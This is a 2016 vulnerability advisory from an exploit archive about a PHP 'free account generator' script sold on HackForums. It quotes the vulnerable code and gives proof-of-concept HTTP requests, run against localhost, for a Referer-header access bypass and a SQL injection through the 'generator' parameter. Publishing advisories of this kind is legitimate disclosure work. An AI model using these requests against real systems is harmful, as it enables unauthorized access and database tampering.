HackForums FAG 2.0 - Multiple Vulnerabilities

2016.08.23
ae bRpsd (AE) ae
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

============================================================================================== [-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities [-] Author => bRpsd (skype: vegnox) [-] Date Release => 22 August, 2016 [-] Vendor => HackForums, froy0z Title => Free Account Generator 2.0 Thread Post => http://hackforums.net/showthread.php?tid=4882268 Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA Vulnerable Version => 2.0 Tested Version => Latest, 2.0 on a Wamp Server ============================================================================================== Vulnerability #1 : Using the generator without even registration or purchasing a membership. Vuln File: /lib/generate.php Vuln Code: Line 3-6 /********************************************************************************* 3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST')); 4. if($pos===false){ 5. die('No Access'); 6. } *********************************************************************************/ strpos checks if the HTTP_REFERER matches with HTTP_HOST before generating data which make it possible for anyone to use the generator by simply changing the referer. [-] Proof Of Concept [-] http://localhost/lib/generate.php?generator=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive If-None-Match: 1 Upgrade-Insecure-Requests: 1 Response: No Access [bypass] http://localhost/lib/generate.php?generator=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lib/generate.php?generator=1 Connection: keep-alive If-None-Match: 1 Upgrade-Insecure-Requests: 1 Response: test@account.com:123123 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Vulnerability #2 : SQL Injection Vuln File: /lib/generate.php Vuln Code: Line 10 & 34-40 /****************************************************************************************************************************************************************** 10. $generator = mysqli_real_escape_string($con, $_GET['generator']); 34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con)); 35. if(mysqli_num_rows($result) < 1){ 36. exit("0 Accounts in stock"); 37. } 38. while($row = mysqli_fetch_array($result)){ 39. echo $row['alt']; 40. } ******************************************************************************************************************************************************************/ The mysqli_query use the parameter 'generator' in the SQL query, which makes it possible to interfer and send malicious commands to the DBMS. [-] Proof Of Concept [-] http://localhost/lib/generate.php?generator=1+3 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lib/generate.php?generator=1+3 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-None-Match: 1 Response: Table 'FAG_2sql1.generator1 3' doesn't exist http://localhost/lib/generate.php?generator=1`+TEST Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lib/generate.php?generator=1`+TEST Connection: keep-alive Upgrade-Insecure-Requests: 1 If-None-Match: 1 Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1

References:

http://hackforums.net/showthread.php?tid=4882268


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top